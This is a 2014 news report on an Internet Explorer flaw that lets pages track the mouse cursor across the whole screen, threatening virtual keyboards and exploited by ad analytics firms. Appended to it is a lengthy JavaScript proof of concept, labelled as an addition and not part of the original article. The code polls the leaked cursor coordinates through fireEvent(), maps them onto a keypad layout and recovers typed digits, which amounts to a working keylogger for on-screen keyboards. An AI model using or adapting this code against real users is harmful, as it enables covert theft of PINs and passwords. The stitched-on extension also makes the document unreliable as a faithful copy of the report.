September 22, 2014

IE lets web pages track mouse movements, bad news for virtual keyboards, great news for unscrupulous ad companies

(LiveHacking.Com) – Details have emerged about how Microsoft Internet Explorer allows web pages running JavaScript to track the whereabouts of the mouse anywhere on the screen, even outside the currently viewed web page. The ramifications of this are twofold. First, those using virtual keyboards as a way to avoid possible keyloggers can no longer assume that the virtual keyboard is safe. Secondly, it appears that unscrupulous ad companies have been using this flaw for a while to measure the viewability of display ads.

Spider.io, a web analytics firm, told Microsoft about the flaw in October, but Redmond has done nothing about it. The issue affects all versions of Internet Explorer from version 6 to version 10, and only since the findings were made public has Microsoft commented on the vulnerability. At the moment Microsoft has no plans to patch the flaw.

The team at Spider.io have created a game to illustrate how easy it is to exploit IE and compromise the security of virtual keyboards. The game may be found at iedataleak.spider.io. There is also a demonstration showing how the flaw can be used to track the mouse over the Skype keypad despite the fact that the Internet Explorer window is not active.

According to Doug de Jager, chief executive of spider.io, the vulnerability is already being exploited by at least two display ad analytics companies across billions of page impressions per month.

“The vulnerability is being exploited rather mischievously by these companies to measure the viewability of display ads – arguably the hot topic in display advertising at the moment,” de Jager told the Guardian. “Almost every US-based user of Internet Explorer will have their mouse cursor tracked via this exploit almost every day they browse the web.”

Microsoft’s lack of action is a little surprising and it is Redmond’s indifference that has caused Spider.io to disclose the details of the flaw. “We are currently investigating this issue, but to date there are no reports of active exploits or customers that have been adversely affected,” Microsoft said in a statement, adding that it would take “appropriate action to protect our customers”.

Details of the vulnerability

Due to a design flaw, Internet Explorer populates its global event object (window.event) with mouse attributes, including the cursor’s screen coordinates, even for events that the page fires itself rather than the user. A web page can therefore attach a mousemove handler to any element and call IE’s proprietary fireEvent() method on that element from a timer: each synthetic mousemove is delivered with the real cursor position, wherever on the screen it happens to be. The reason programs such as Skype can be tracked is that fireEvent() and the handler run even when the IE window is not active or focused, so the polling carries on in the background while the user types into another application.
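The polling loop described above, written out as an added example (this is not Spider.io’s demonstration code and it is not from the original article). It wires the IE-only attachEvent()/fireEvent() calls into a poller, then goes one step further than the article and shows how the sampled coordinates are mapped onto an on-screen keypad to recover what was typed, which is the virtual-keyboard threat the article raises. The function names, the 3x4 keypad geometry, the dwell threshold of four samples and the simulated element (a stand-in that hands back a scripted cursor path so the demo runs in Node without a browser) are all assumptions of this example. In a real IE 6 to 10 window you would pass a genuine DOM element and call poll() from setInterval(); in a conforming browser the synthetic event’s screenX/screenY simply would not be populated and nothing useful would be collected.

```javascript
// Added example: polling the cursor through IE's fireEvent() leak and mapping
// the samples onto an on-screen keypad. Modelled on the behaviour the article
// describes, not Spider.io's own code. Keypad geometry, dwell threshold and the
// simulated element below are assumptions made for this demo.

// Attach a mousemove handler to el and return a poll() function. Each poll()
// fires a synthetic onmousemove through the legacy IE API; in affected IE
// versions the event object handed to the handler carries the cursor's current
// screenX/screenY even though fireEvent() supplied no coordinates and the page
// need not be focused. A conforming browser leaves them 0/undefined.
function makeCursorPoller(el, samples) {
  el.attachEvent("onmousemove", function (e) {
    samples.push({ x: e.screenX, y: e.screenY });
  });
  return function poll() {
    el.fireEvent("onmousemove");
  };
}

// Build a phone-style keypad layout in screen coordinates (assumed geometry:
// rows of equal-sized keys starting at originX/originY).
function buildKeypad(originX, originY, keyW, keyH, rows) {
  var keys = [];
  rows.forEach(function (row, r) {
    row.split("").forEach(function (label, c) {
      keys.push({ label: label, x: originX + c * keyW, y: originY + r * keyH, w: keyW, h: keyH });
    });
  });
  return keys;
}

// Hit-test a screen position against the keypad; null when over no key.
function keyAt(keypad, x, y) {
  for (var i = 0; i < keypad.length; i++) {
    var k = keypad[i];
    if (x >= k.x && x < k.x + k.w && y >= k.y && y < k.y + k.h) return k.label;
  }
  return null;
}

// Turn a stream of sampled positions into keystrokes: a run of at least
// dwellSamples consecutive samples over one key is treated as a press, so
// brushing past a key on the way to another is ignored.
function inferKeys(samples, keypad, dwellSamples) {
  var typed = "", current = null, run = 0;
  for (var i = 0; i <= samples.length; i++) {
    var label = i < samples.length ? keyAt(keypad, samples[i].x, samples[i].y) : null;
    if (label === current) { run++; continue; }
    if (current !== null && run >= dwellSamples) typed += current;
    current = label;
    run = 1;
  }
  return typed;
}

// Stand-in for an IE element so the demo runs outside the browser: fireEvent()
// hands the handler an event carrying the "cursor" position from a scripted
// path, which is what the real IE leak does with the live cursor.
function simulatedIEElement(cursorPath) {
  var handler = null, i = 0;
  return {
    attachEvent: function (name, fn) { if (name === "onmousemove") handler = fn; },
    fireEvent: function (name) {
      if (name !== "onmousemove" || !handler || i >= cursorPath.length) return;
      var p = cursorPath[i++];
      handler({ type: "mousemove", screenX: p[0], screenY: p[1] });
    }
  };
}

function repeat(point, n) {
  var out = [];
  for (var i = 0; i < n; i++) out.push(point);
  return out;
}

// Constructed cursor path: hover outside the keypad, dwell on 4, brush past 5,
// dwell on 2, dwell on #, return to 4.
var DEMO_PATH = [].concat(
  repeat([50, 150], 2),
  repeat([120, 260], 5),
  repeat([160, 260], 2),
  repeat([160, 220], 6),
  repeat([200, 340], 4),
  repeat([120, 260], 5)
);

// Assumed keypad: 40x40 keys, top-left at screen (100, 200), Skype-style layout.
var DEMO_KEYPAD = buildKeypad(100, 200, 40, 40, ["123", "456", "789", "*0#"]);

// Run the poller over the scripted path (in IE you would call poll() from
// setInterval, e.g. every 100 ms) and recover the digits that were typed.
function demo() {
  var samples = [];
  var el = simulatedIEElement(DEMO_PATH);
  var poll = makeCursorPoller(el, samples);
  for (var i = 0; i < DEMO_PATH.length; i++) poll();
  return inferKeys(samples, DEMO_KEYPAD, 4);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("recovered keystrokes:", demo());
}
```

Run it with node to see the recovered digits. The dwell heuristic is deliberately simple; a real collector would also record timestamps and look for click-like pauses, but it is enough to show that leaked screen coordinates plus a known keypad layout amount to a keylogger for any on-screen keyboard.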
